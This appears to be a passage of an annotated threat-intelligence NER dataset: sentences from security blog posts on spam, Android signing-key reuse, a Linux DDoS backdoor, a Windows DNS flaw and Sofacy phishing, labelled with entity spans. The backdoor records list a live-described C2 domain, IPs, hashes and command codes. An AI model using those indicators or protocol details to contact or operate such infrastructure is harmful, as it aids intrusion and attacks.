begun.","entities":[],"relations":[],"Comments":[]} {"id":1419,"text":"While we haven’t seen any indication that the spam volume has begun to slow down, we do expect the campaign to wind down in the next 24 hours, but a new campaign will probably be close behind.","entities":[{"id":4262,"label":"TIME","start_offset":124,"end_offset":141}],"relations":[],"Comments":[]} {"id":1420,"text":"WildFire users can rest assured that they’ll be protected from whatever Kuluoz has in-store next.","entities":[{"id":46758,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46759,"label":"malware","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":1421,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":1422,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1423,"text":"Following a recent study of apps in the Google Play Store, let’s discuss several security risks caused by the bad certificate management practiced in many Android apps, from social to mobile banking.","entities":[{"id":46760,"label":"SOFTWARE","start_offset":40,"end_offset":57},{"id":46761,"label":"SOFTWARE","start_offset":155,"end_offset":162}],"relations":[],"Comments":[]} {"id":1424,"text":" All Android apps must be digitally signed with a certificate from the developer.","entities":[{"id":46762,"label":"SOFTWARE","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":1425,"text":"As described in Google’s official document, the app developer is required to create a keystore with a set of private keys, and then use the private key to generate a signed version of apps.","entities":[{"id":46763,"label":"identity","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} {"id":1426,"text":"This key has to be valid for at least 25 years.","entities":[],"relations":[],"Comments":[]} {"id":1427,"text":"These certificates do not have to be generated by a certificate authority and can instead be self-signed.","entities":[],"relations":[],"Comments":[]} {"id":1428,"text":"Because this is simpler and allows the author to retain the private key, the majority of Google store apps use self-signed certificates.","entities":[{"id":45017,"label":"SOFTWARE","start_offset":89,"end_offset":105}],"relations":[],"Comments":[]} {"id":1429,"text":"This means it is the developer’s responsibility to keep the private key safe, whether that developer is a 13-year-old or a multi-national company.","entities":[],"relations":[],"Comments":[]} {"id":1430,"text":"As this means the security protecting private keys varies widely, the security risks of bad certificate management cannot be ignored and must be identified, and where necessary, mitigated.","entities":[],"relations":[],"Comments":[]} {"id":1431,"text":" Security researchers are starting to take note and publish on this subject.","entities":[],"relations":[],"Comments":[]} {"id":1432,"text":"For example, BlueBox recently revealed the Fake ID vulnerability, which exploits an app’s certificate verification process within the Android OS.","entities":[{"id":46764,"label":"identity","start_offset":13,"end_offset":20},{"id":46765,"label":"SOFTWARE","start_offset":134,"end_offset":144}],"relations":[],"Comments":[]} {"id":1433,"text":"If they haven’t already","entities":[],"relations":[],"Comments":[]} {"id":1434,"text":", soon attackers and malware authors will turn their attention to exploiting vulnerabilities surrounding Android app certificates.","entities":[{"id":46766,"label":"SOFTWARE","start_offset":105,"end_offset":116}],"relations":[],"Comments":[]} {"id":1435,"text":"When an app is published to the Google Play Store, the certificate information is included within the APK file.","entities":[{"id":46767,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} {"id":1436,"text":"To view the certificate information just open the given APK file as a zip file.","entities":[],"relations":[],"Comments":[]} {"id":1437,"text":"The certificate information is stored within the certificate’s “\/META-INF” folder.","entities":[{"id":46768,"label":"FILEPATH","start_offset":65,"end_offset":74}],"relations":[],"Comments":[]} {"id":1438,"text":"You can use keytool or openssl tools to view the certificate information.","entities":[],"relations":[],"Comments":[]} {"id":1439,"text":"An example taken from the popular Angry Birds app is shown in Figure 1.","entities":[{"id":46769,"label":"SOFTWARE","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} {"id":1440,"text":"The certificate fingerprints (circled in red) are what can be used to uniquely identify a certificate.","entities":[],"relations":[],"Comments":[]} {"id":1441,"text":" Figure 1 These digital certificates, self-signed or not, are the keys to updating apps in the Android ecosystem.","entities":[{"id":46770,"label":"SOFTWARE","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":1442,"text":"It is a primary reason the expiration dates are set so far into the future and developers are able to self-sign certificates.","entities":[],"relations":[],"Comments":[]} {"id":1443,"text":"The only way to update an app is for the developer to sign the update with the same digital certificate originally used to publish the app.","entities":[{"id":47145,"label":"identity","start_offset":41,"end_offset":51}],"relations":[],"Comments":[]} {"id":1444,"text":"If a developer wants to use a different certificate, they must publish the update separately as a new app.","entities":[],"relations":[],"Comments":[]} {"id":1445,"text":" Furthermore, all Android apps published using the same certificate have a trust relationship between them.","entities":[{"id":46771,"label":"SOFTWARE","start_offset":18,"end_offset":25}],"relations":[],"Comments":[]} {"id":1446,"text":"Android allows apps signed by the same certificate to run in the same process and treats them as one single application instead of separate ones.","entities":[{"id":46772,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":1447,"text":"It also allows multiple apps with the same certificate, if using signature-based permission checks, to expose functionality and exchange code and data amongst themselves.","entities":[],"relations":[],"Comments":[]} {"id":1448,"text":"This is convenient for developers, which is great, but it is also convenient for hackers, which is not.","entities":[],"relations":[],"Comments":[]} {"id":1449,"text":" Losing control of a certificate’s private key, or using an insecure private key, can have severe security consequences.","entities":[],"relations":[],"Comments":[]} {"id":1450,"text":"For example, if an attacker obtained the private key of an app, he or she could create a fake APK file, sign it using the same certificate as the legitimate app, and replace the targeted app with fake app on the device silently using the “Application upgrade” procedure.","entities":[],"relations":[],"Comments":[]} {"id":1451,"text":"In addition, if the attacker can’t create an app with the same name as the targeted app, he or she can still check the “SharedUserId” option.","entities":[],"relations":[],"Comments":[]} {"id":1452,"text":"This allows apps with different package names but signed with the same certificate to share permissions and stored data.","entities":[],"relations":[],"Comments":[]} {"id":1453,"text":" Because of this, app developers should be extremely careful about re-using certificates when signing their apps.","entities":[],"relations":[],"Comments":[]} {"id":1454,"text":" Ideally, an app developer should generate a unique private key for each unique app they post in the Google Play Store.","entities":[{"id":46773,"label":"SOFTWARE","start_offset":101,"end_offset":118}],"relations":[],"Comments":[]} {"id":1455,"text":" Unfortunately, during our study of apps posted in the Google Play Store we collected approximately 246,000 Android apps but only 11,681 certificates.","entities":[{"id":45020,"label":"SOFTWARE","start_offset":55,"end_offset":72},{"id":45021,"label":"SOFTWARE","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} {"id":1456,"text":"The distribution of the number of apps sharing the same key is shown below.","entities":[],"relations":[],"Comments":[]} {"id":1457,"text":"The X-axis is the number of apps sharing the same certificate.","entities":[],"relations":[],"Comments":[]} {"id":1458,"text":"The Y-axis is the number of certificates.","entities":[],"relations":[],"Comments":[]} {"id":1459,"text":"For example, the number of certificates used by only one app is 1,323.","entities":[],"relations":[],"Comments":[]} {"id":1460,"text":"About 6,925 certificates are used to sign between 6 and 19 different apps.","entities":[],"relations":[],"Comments":[]} {"id":1461,"text":" Figure 2 ","entities":[],"relations":[],"Comments":[]} {"id":1462,"text":"As we see in this distribution, a lot of developers sign different apps with the same certificate.","entities":[],"relations":[],"Comments":[]} {"id":1463,"text":"We further investigated the following cases: ","entities":[],"relations":[],"Comments":[]} {"id":1464,"text":"1. Signing apps with a publicly known private key Many key pairs are well known in the development community.","entities":[],"relations":[],"Comments":[]} {"id":1465,"text":"The most famous set of key pairs would be the key pairs included within the AOSP source files (in Table 1, below). ","entities":[{"id":46774,"label":"SOFTWARE","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} {"id":1466,"text":"More key pairs can be found in developer forums and academic research.","entities":[],"relations":[],"Comments":[]} {"id":1467,"text":" Table 1 If one app is signed using the publicly known private keys, it is easy for other apps on the same device to replace this vulnerable app with another APK file, silently with no user knowledge or interaction.","entities":[],"relations":[],"Comments":[]} {"id":1468,"text":" We scanned our inventory of APK files downloaded from the Google Play Store and found at least 87 apps using the “testkey” in Table 1.","entities":[{"id":46775,"label":"SOFTWARE","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} {"id":1469,"text":"According to the Google Play Store, these 87 apps have been downloaded more than 1.6 million times.","entities":[{"id":46776,"label":"SOFTWARE","start_offset":17,"end_offset":34}],"relations":[],"Comments":[]} {"id":1470,"text":"For security reasons we are not posting the names of any of these apps.","entities":[],"relations":[],"Comments":[]} {"id":1471,"text":"Under no circumstances should developers ever use private keys that are publicly available, nor should users download them.","entities":[],"relations":[],"Comments":[]} {"id":1472,"text":"However, it isn’t easy for users to know the app they’re downloading is using a compromised private key – the onus for this is squarely on developers.","entities":[],"relations":[],"Comments":[]} {"id":1473,"text":" 2. Mobile banking apps sharing one single key Mobile banking apps are particularly sensitive with significant security concerns, which is why we were surprised to discover one certificate was used to sign more than 300 mobile banking apps in the Google Play Store.","entities":[{"id":46777,"label":"SOFTWARE","start_offset":248,"end_offset":265}],"relations":[],"Comments":[]} {"id":1474,"text":"This practice is not necessarily dangerous, as long as the developer does not share the key with the various banks that contracted the applications.","entities":[],"relations":[],"Comments":[]} {"id":1475,"text":" We’ve contacted the developer to confirm they have retained sole custody of the keys.","entities":[],"relations":[],"Comments":[]} {"id":1476,"text":"Of course, even with out-sourced application development, app owners should prefer to hold their own key.","entities":[],"relations":[],"Comments":[]} {"id":1477,"text":"Whoever controls the key controls updates for the application forever, and a key shared between applications in this way can never be transferred to a financial institution without compromising the security of all of the other apps signed with it.","entities":[],"relations":[],"Comments":[]} {"id":1478,"text":"The developer is aware of this concern and plans to encourage more of its customers to sign their own applications in the coming year.","entities":[],"relations":[],"Comments":[]} {"id":1479,"text":"In addition to our research, the Baidu Security team in China recently found 23 mobile banking apps sharing the same certificate hosted by a third party app developer and reported the discovery to the CNCERT in China.","entities":[{"id":45023,"label":"location","start_offset":56,"end_offset":61},{"id":45025,"label":"location","start_offset":211,"end_offset":216},{"id":45026,"label":"identity","start_offset":201,"end_offset":207},{"id":45024,"label":"identity","start_offset":33,"end_offset":52}],"relations":[{"id":58,"from_id":45026,"to_id":45025,"type":"located-at"},{"id":219,"from_id":45024,"to_id":45023,"type":"located-at"}],"Comments":[]} {"id":1480,"text":" 3. Third party app developers using the same key for all apps generated for all customers ","entities":[],"relations":[],"Comments":[]} {"id":1481,"text":"The app developer industry is booming.","entities":[],"relations":[],"Comments":[]} {"id":1482,"text":"These developers help customers build mobile apps for their businesses easily and quickly.","entities":[],"relations":[],"Comments":[]} {"id":1483,"text":"They serve an important role for the majority of businesses that do not have in-house developers.","entities":[],"relations":[],"Comments":[]} {"id":1484,"text":"Unfortunately, we uncovered some of these developers using the same certificate for every app.","entities":[],"relations":[],"Comments":[]} {"id":1485,"text":"Again, using the same private key is probably due to the convenience in app management.","entities":[],"relations":[],"Comments":[]} {"id":1486,"text":"But as we noted earlier, apps signed by the same certificate can automatically grant sharing relationships amongst themselves.","entities":[],"relations":[],"Comments":[]} {"id":1487,"text":" This means all of the apps created by these developers, regardless of intended use, could be used maliciously.","entities":[],"relations":[],"Comments":[]} {"id":1488,"text":"Table 2 shows select top app developers using the same certificate in signing all their apps.","entities":[],"relations":[],"Comments":[]} {"id":1489,"text":" For security reasons, we have masked the names.","entities":[],"relations":[],"Comments":[]} {"id":1490,"text":" Table 2 Digital certificates are a critical component of the security of Android apps.","entities":[{"id":46778,"label":"SOFTWARE","start_offset":75,"end_offset":82}],"relations":[],"Comments":[]} {"id":1491,"text":"Unfortunately, many app developers in the Google Play Store have ignored these concerns in favor of convenience.","entities":[{"id":45027,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":1492,"text":"While in some cases that may be justified – the app may not contain any important or identifying information – in many of the cases we discovered it is not.","entities":[],"relations":[],"Comments":[]} {"id":1493,"text":"This poses great potential security risks to both app users and app owners.","entities":[],"relations":[],"Comments":[]} {"id":1494,"text":"We encourage developers to reconsider their stance on this issue and where necessary make changes before a significant security event happens.","entities":[],"relations":[],"Comments":[]} {"id":1495,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1496,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1497,"text":"A backdoor implant is an increasingly common mechanism for maintaining unauthorized access and control over a computer asset.","entities":[{"id":45029,"label":"attack-pattern","start_offset":71,"end_offset":90}],"relations":[],"Comments":[]} {"id":1498,"text":"The terms remote administration tool (RAT) and trojan downloader are often used synonymously with such implants.","entities":[],"relations":[],"Comments":[]} {"id":1499,"text":"Once installed (i.e. implanted on a system), the modern backdoor typically offers much more than simple (i.e. command line) access to a system.","entities":[],"relations":[],"Comments":[]} {"id":1500,"text":" Depending on the backdoor’s specialization and sophistication, it can also capture keystrokes, take screenshots, scrape memory for valuable information, search for files meeting certain criteria, query databases, download files and additional malware, exfiltrate data and files, and even serve as an attack platform.","entities":[],"relations":[],"Comments":[]} {"id":1501,"text":"Effectively, a backdoor implant affects loss of control over a computer asset.","entities":[],"relations":[],"Comments":[]} {"id":1502,"text":" The tangible and intangible impacts of this loss of control vary based on respective backdoor capabilities, and may include the following: leakage of authentication credentials, loss of intellectual property, exposure of sensitive information, negative standing or reputation, and various levels of liability for actions executed on or from the compromised asset.","entities":[],"relations":[],"Comments":[]} {"id":1503,"text":" Recently Palo Alto Networks discovered a backdoor program ( md5: b826fb1253a52a3b53afa3b7543d7694, sha256: 6bedd1b0716fe7632188932451f75295346836545e6d2bfee1b56121e02ca110 ) that is used to control a linux operating system.","entities":[{"id":45032,"label":"SHA2","start_offset":108,"end_offset":172},{"id":45033,"label":"identity","start_offset":10,"end_offset":28},{"id":45031,"label":"MD5","start_offset":66,"end_offset":98},{"id":45034,"label":"SOFTWARE","start_offset":201,"end_offset":223}],"relations":[{"id":220,"from_id":45031,"to_id":45032,"type":"related-to"}],"Comments":[]} {"id":1504,"text":" This particular linux backdoor will install itself to \"\/usr\/bin\/btdaemon\" and create a startup service at \"\/etc\/init.d\/bluetoothdaemon\" with symbolic links so that it will run in any startup mode. The file contents are a simple bash script that runs the original btdaemon file.","entities":[{"id":46779,"label":"FILEPATH","start_offset":56,"end_offset":73},{"id":46780,"label":"FILEPATH","start_offset":108,"end_offset":135}],"relations":[],"Comments":[]} {"id":1505,"text":" The backdoor when run will create threads for each connection listed in its config file. The sample that was caught by our systems contains 3 IP addresses in its config file.","entities":[],"relations":[],"Comments":[]} {"id":1506,"text":" For each IP address the btdaemon service will attempt to make a connection on UDP ports 53, 80, 110, and 443.","entities":[],"relations":[],"Comments":[]} {"id":1507,"text":" Upon successful connection it will send the string \"¡°MlCROS0FT|1.2 Apr 26 2014 02:37:05|Linux Kernel Version¡±\" and will wait for an \"Auth\" packet from the server.","entities":[],"relations":[],"Comments":[]} {"id":1508,"text":" If the backdoor receives a packet in the form of a \"cmdType|cmdBody\" it will check the cmdType list and execute the equivalent instruction. Valid instructions are between 0-9 and there functionality varies depending on the command.","entities":[],"relations":[],"Comments":[]} {"id":1509,"text":" While running the btdaemon process also inspects whether there is an \".IptabLes\" or \".IptabLex\" local process, and sends back status for monitoring purposes. If the \"disablerun\" command is sent the backdoor will download a file named \"run.txt\" from one of the following URLs: The file data is in the format \"exe_path_1 | exe_path_2 | ... | exe_path_N\". If none of the paths is correct then a \"getsetup.rar\" file is downloaded and run.","entities":[{"id":45035,"label":"FILEPATH","start_offset":397,"end_offset":409},{"id":45037,"label":"FILEPATH","start_offset":237,"end_offset":244}],"relations":[],"Comments":[]} {"id":1510,"text":"This is an ELF file and there are various encrypted portions within it.","entities":[],"relations":[],"Comments":[]} {"id":1511,"text":" There exist two embedded zlib-encrypted blocks at file offset 0x8C0C0 and 0xE6B40 respectively.","entities":[{"id":4493,"label":"tools","start_offset":26,"end_offset":30}],"relations":[],"Comments":[]} {"id":1512,"text":" When run if the filename does not include the \"IptabLes\" string then the data is decrypted, written to disk, and then executed, installing itself as a startup service on the machine and place itself in one of the following locations: The second encrypted block is configuration data, which includes some IP addresses and DNS data which is used when it writes the first decrypted block to a file.","entities":[],"relations":[],"Comments":[]} {"id":1513,"text":" \"dns.po888.com|122.228.242.51|119.145.148.56|162.221.13.82\".","entities":[{"id":46781,"label":"DOMAIN","start_offset":2,"end_offset":15},{"id":46782,"label":"IPV4","start_offset":16,"end_offset":30},{"id":46783,"label":"IPV4","start_offset":31,"end_offset":45},{"id":46784,"label":"IPV4","start_offset":46,"end_offset":59}],"relations":[],"Comments":[]} {"id":1514,"text":" If the file is run in a path including the \"IptabLes\" string then it installs itself as a startup service and proceeds into its main loop.","entities":[],"relations":[],"Comments":[]} {"id":1515,"text":" Either path the \"getsetup.rar\" file takes is meant to ensure that it is installed as a startup service, ensuring persistence. Once the file is running it creates a process identifier (PID) so that only one instance is running at any given time.","entities":[{"id":46785,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":1516,"text":"The file will connect to an IP and port configured from the configuration data and sends along information that includes the cpu and memory information.","entities":[],"relations":[],"Comments":[]} {"id":1517,"text":" If the file does not receive any data within 30 seconds it will send a \"xy\" response back to the server.","entities":[],"relations":[],"Comments":[]} {"id":1518,"text":" If the file does receive data from the server in excess of 20 bytes it will be in the following format: <2 byte data length><0xABCDEF88> The decrypted data will contain the following fields: The attack type field is used to determine if a SYN DDoS or DNS DDoS is used in an attack.","entities":[],"relations":[],"Comments":[]} {"id":1519,"text":" The Src IP Begin and End are the start and ending IP ranges used as a fake src addresses in the DNS DDoS. The IP range can also be controlled by global variables within the binary itself as well.","entities":[],"relations":[],"Comments":[]} {"id":1520,"text":" If the received data has 0x22 as the first set of bytes then the received data will be in the following format: <0x22> It will also do the following UDP connection test: If the first value in the packet is 0xC8 then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\" and \"g_mainsrvinfo.udpport\" to the passed in values.","entities":[],"relations":[],"Comments":[]} {"id":1521,"text":" If the first value in the packet is 0xCC then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\". If the first value in the packet is 0x33 the file will use tcp to download a file and execute it.","entities":[],"relations":[],"Comments":[]} {"id":1522,"text":" If the first value in the packet is 0x20 the file will delete all DDoS tasks.","entities":[],"relations":[],"Comments":[]} {"id":1523,"text":" If the first value in the packet is 0x10 then the file will send back the current socket handle as a response back.","entities":[],"relations":[],"Comments":[]} {"id":1524,"text":" Currently these IP addresses are alive and active.","entities":[],"relations":[],"Comments":[]} {"id":1525,"text":" Palo Alto Networks strongly recommends you inspect your systems and update your firewall rules and IPS systems. Palo Alto Networks customers with active subscriptions to Threat Prevention are protected against these threats automatically, signature #13469 was released to protect against this specific threat.","entities":[{"id":46786,"label":"identity","start_offset":1,"end_offset":19},{"id":46787,"label":"identity","start_offset":114,"end_offset":132}],"relations":[],"Comments":[]} {"id":1526,"text":" Similar to any other malware family or threat, Palo Alto Networks customers should use the entire security framework for threat mitigation and threat prevention coverage. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46788,"label":"identity","start_offset":48,"end_offset":66}],"relations":[],"Comments":[]} {"id":1527,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1528,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1529,"text":"This post is also available in: 日本語 (Japanese) In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.","entities":[{"id":46789,"label":"TIME","start_offset":56,"end_offset":65},{"id":46790,"label":"identity","start_offset":67,"end_offset":76},{"id":46791,"label":"vulnerability","start_offset":105,"end_offset":118},{"id":46792,"label":"vulnerability","start_offset":121,"end_offset":176},{"id":46793,"label":"attack-pattern","start_offset":187,"end_offset":214}],"relations":[{"id":221,"from_id":46791,"to_id":46792,"type":"related-to"},{"id":223,"from_id":46793,"to_id":46791,"type":"targets"},{"id":222,"from_id":46793,"to_id":46792,"type":"targets"}],"Comments":[]} {"id":1530,"text":" This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53\/TCP.","entities":[{"id":45039,"label":"SOFTWARE","start_offset":40,"end_offset":82},{"id":4560,"label":"identity","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} {"id":1531,"text":"Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.","entities":[{"id":46794,"label":"attack-pattern","start_offset":103,"end_offset":124}],"relations":[],"Comments":[]} {"id":1532,"text":" This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS): ","entities":[{"id":46795,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":46796,"label":"SOFTWARE","start_offset":77,"end_offset":116}],"relations":[],"Comments":[]} {"id":1533,"text":"As always, we recommend our customers patch their systems as soon as possible.","entities":[],"relations":[],"Comments":[]} {"id":1534,"text":"Microsoft also provided a workaround in cases where patches are not immediately possible.","entities":[{"id":46797,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":1535,"text":"Please review KB4569509: Guidance for DNS Server Vulnerability CVE-2020-1350 for more details.","entities":[{"id":46798,"label":"vulnerability","start_offset":38,"end_offset":76}],"relations":[],"Comments":[]} {"id":1536,"text":" Palo Alto Networks Threat Prevention and Cortex XDR provide protection against the exploitation of this vulnerability: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45043,"label":"identity","start_offset":123,"end_offset":141},{"id":45040,"label":"identity","start_offset":3,"end_offset":21},{"id":45041,"label":"SOFTWARE","start_offset":44,"end_offset":54},{"id":45042,"label":"SOFTWARE","start_offset":3,"end_offset":39}],"relations":[],"Comments":[]} {"id":1537,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1538,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1539,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1540,"text":"Overview Palo Alto Networks Unit 42 threat research team has just uncovered a new set of attacks by the Sofacy group using malicious emails targeting foreign affairs agencies and ministries in North America and Europe, including a European embassy in Moscow.","entities":[{"id":46799,"label":"identity","start_offset":9,"end_offset":56},{"id":46801,"label":"location","start_offset":193,"end_offset":206},{"id":46802,"label":"location","start_offset":211,"end_offset":217},{"id":46806,"label":"attack-pattern","start_offset":123,"end_offset":139},{"id":46808,"label":"location","start_offset":251,"end_offset":257},{"id":46807,"label":"identity","start_offset":231,"end_offset":247},{"id":46805,"label":"threat-actor","start_offset":104,"end_offset":116}],"relations":[{"id":226,"from_id":46805,"to_id":46806,"type":"uses"},{"id":227,"from_id":46807,"to_id":46808,"type":"located-at"},{"id":228,"from_id":46805,"to_id":46807,"type":"targets"},{"id":229,"from_id":46805,"to_id":46801,"type":"targets"},{"id":230,"from_id":46805,"to_id":46802,"type":"targets"}],"Comments":[]} {"id":1541,"text":"Given the significant activity attributed to Sofacy, and the new evidence directly targeting the diplomatic community, Palo Alto Networks wants to ensure that foreign affairs agencies around the world understand how the attacks are carried out, and what agencies and personnel can do to protect themselves.","entities":[{"id":46809,"label":"threat-actor","start_offset":45,"end_offset":51},{"id":46810,"label":"identity","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} {"id":1542,"text":"The Sofacy Group (AKA APT28, Grizzly Steppe, Fancy Bear, STRONTIUM, Sednit, Tsar Team, Pawn Storm) is a well-known hacking organization widely reported to be associated with Russia by the US Intelligence Community, numerous media reports and other cybersecurity companies.","entities":[{"id":45045,"label":"threat-actor","start_offset":4,"end_offset":16},{"id":45046,"label":"threat-actor","start_offset":22,"end_offset":27},{"id":45051,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":45052,"label":"threat-actor","start_offset":87,"end_offset":97},{"id":45053,"label":"location","start_offset":174,"end_offset":180},{"id":45054,"label":"identity","start_offset":188,"end_offset":213},{"id":45047,"label":"threat-actor","start_offset":29,"end_offset":43},{"id":45048,"label":"threat-actor","start_offset":45,"end_offset":55},{"id":45049,"label":"threat-actor","start_offset":57,"end_offset":66},{"id":45050,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[{"id":59,"from_id":45045,"to_id":45053,"type":"located-at"},{"id":60,"from_id":45046,"to_id":45053,"type":"located-at"},{"id":62,"from_id":45048,"to_id":45053,"type":"located-at"},{"id":63,"from_id":45049,"to_id":45053,"type":"located-at"},{"id":64,"from_id":45050,"to_id":45053,"type":"located-at"},{"id":68,"from_id":45046,"to_id":45045,"type":"duplicate-of"},{"id":69,"from_id":45047,"to_id":45045,"type":"duplicate-of"},{"id":65,"from_id":45051,"to_id":45053,"type":"located-at"},{"id":66,"from_id":45052,"to_id":45053,"type":"located-at"},{"id":70,"from_id":45048,"to_id":45045,"type":"duplicate-of"},{"id":71,"from_id":45049,"to_id":45045,"type":"duplicate-of"},{"id":72,"from_id":45050,"to_id":45045,"type":"duplicate-of"},{"id":61,"from_id":45047,"to_id":45053,"type":"located-at"},{"id":73,"from_id":45051,"to_id":45045,"type":"duplicate-of"},{"id":74,"from_id":45052,"to_id":45045,"type":"duplicate-of"}],"Comments":[]} {"id":1543,"text":" Sofacy Group has been associated with many attacks against targets around the world, including the International Olympic Committee (IOC) in 2018, the World Anti-Doping Agency in 2016, the Dutch Safety Board in 2015, and German, French, Ukrainian, and Dutch political and military targets throughout 2014 through 2018.","entities":[{"id":46818,"label":"location","start_offset":221,"end_offset":227},{"id":46819,"label":"location","start_offset":229,"end_offset":235},{"id":46820,"label":"location","start_offset":237,"end_offset":246},{"id":46822,"label":"identity","start_offset":151,"end_offset":175},{"id":46812,"label":"identity","start_offset":100,"end_offset":137},{"id":46813,"label":"TIME","start_offset":141,"end_offset":145},{"id":46814,"label":"TIME","start_offset":300,"end_offset":304},{"id":46816,"label":"TIME","start_offset":179,"end_offset":183},{"id":46821,"label":"location","start_offset":252,"end_offset":257},{"id":46823,"label":"identity","start_offset":189,"end_offset":207},{"id":46824,"label":"identity","start_offset":258,"end_offset":288},{"id":46811,"label":"threat-actor","start_offset":1,"end_offset":13},{"id":46815,"label":"TIME","start_offset":313,"end_offset":317},{"id":46817,"label":"TIME","start_offset":211,"end_offset":215}],"relations":[{"id":231,"from_id":46811,"to_id":46812,"type":"targets"},{"id":232,"from_id":46811,"to_id":46822,"type":"targets"},{"id":233,"from_id":46811,"to_id":46823,"type":"targets"},{"id":234,"from_id":46811,"to_id":46824,"type":"targets"},{"id":236,"from_id":46824,"to_id":46818,"type":"located-at"},{"id":237,"from_id":46824,"to_id":46819,"type":"located-at"},{"id":238,"from_id":46824,"to_id":46820,"type":"located-at"},{"id":239,"from_id":46824,"to_id":46821,"type":"located-at"}],"Comments":[]} {"id":1544,"text":" How the Attacks are Carried Out: Via Email","entities":[],"relations":[],"Comments":[]} {"id":1545,"text":"These attacks begin with an email sent to a carefully chosen target in the agency.","entities":[],"relations":[],"Comments":[]} {"id":1546,"text":"The recent spoofed emails we have seen are forged to appear to come from Jane’s 360 Defense Events to tell the recipient about events coming up in 2018.","entities":[{"id":46825,"label":"TIME","start_offset":147,"end_offset":151}],"relations":[],"Comments":[]} {"id":1547,"text":" The figure below shows an example.","entities":[],"relations":[],"Comments":[]} {"id":1548,"text":"Once the recipient opens the Excel spreadsheet, she or he does have trouble viewing the document: it opens as a blank spreadsheet.","entities":[{"id":45055,"label":"SOFTWARE","start_offset":29,"end_offset":34}],"relations":[],"Comments":[]} {"id":1549,"text":"The attackers are relying on the recipient to follow the instruction in the email and click “Enable Content”.","entities":[],"relations":[],"Comments":[]} {"id":1550,"text":"You can see below what the spreadsheet looks like and the enable content button.","entities":[],"relations":[],"Comments":[]} {"id":1551,"text":"Clicking the “Enable Content” button is the key to the attack.","entities":[],"relations":[],"Comments":[]} {"id":1552,"text":"While it makes the text in the spreadsheet visible and so seems to solve the problem, it’s a trick: It’s really running a program that silently installs a program on the system.","entities":[],"relations":[],"Comments":[]} {"id":1553,"text":"This program gives the attackers complete control over the computer and can enable them to copy documents, usernames, passwords, account information and even take screenshots.","entities":[],"relations":[],"Comments":[]} {"id":1554,"text":"How you can protect yourself","entities":[],"relations":[],"Comments":[]} {"id":1555,"text":"There are several things that you can do to help protect against these latest Sofacy attacks and others like it.","entities":[{"id":46826,"label":"threat-actor","start_offset":78,"end_offset":84}],"relations":[],"Comments":[]} {"id":1556,"text":" With the public awareness of this particular decoy, it is highly likely that the Sofacy group will shift their attacks to spoof emails from a different organization to continue carrying out these attacks.","entities":[{"id":46827,"label":"threat-actor","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} {"id":1557,"text":" Additionally, this attack technique is not exclusive to the Sofacy Group.","entities":[{"id":45056,"label":"threat-actor","start_offset":61,"end_offset":73}],"relations":[],"Comments":[]} {"id":1558,"text":"Therefore, these suggested actions can protect not just against these known attacks but others like it.","entities":[],"relations":[],"Comments":[]} {"id":1559,"text":" An unexpected email message with an attachment that says you should “enable content” has a high likelihood of being malicious in some way.","entities":[],"relations":[],"Comments":[]} {"id":1560,"text":"If you get an email like this, you shouldn’t open the attachment and click “enable content”.","entities":[],"relations":[],"Comments":[]} {"id":1561,"text":"Instead, you should verify that the message and the attachment are legitimate by contacting the sender in some way other than replying to the email (because replying to the email may go back to the attackers who will, of course, say it’s legitimate).","entities":[],"relations":[],"Comments":[]} {"id":1562,"text":"Or, just delete the message and report it to your security team.","entities":[],"relations":[],"Comments":[]} {"id":1563,"text":"Palo Alto Networks Unit 42 regularly researches threats like these and provides information about them on our blog.","entities":[{"id":45057,"label":"identity","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} {"id":1564,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} 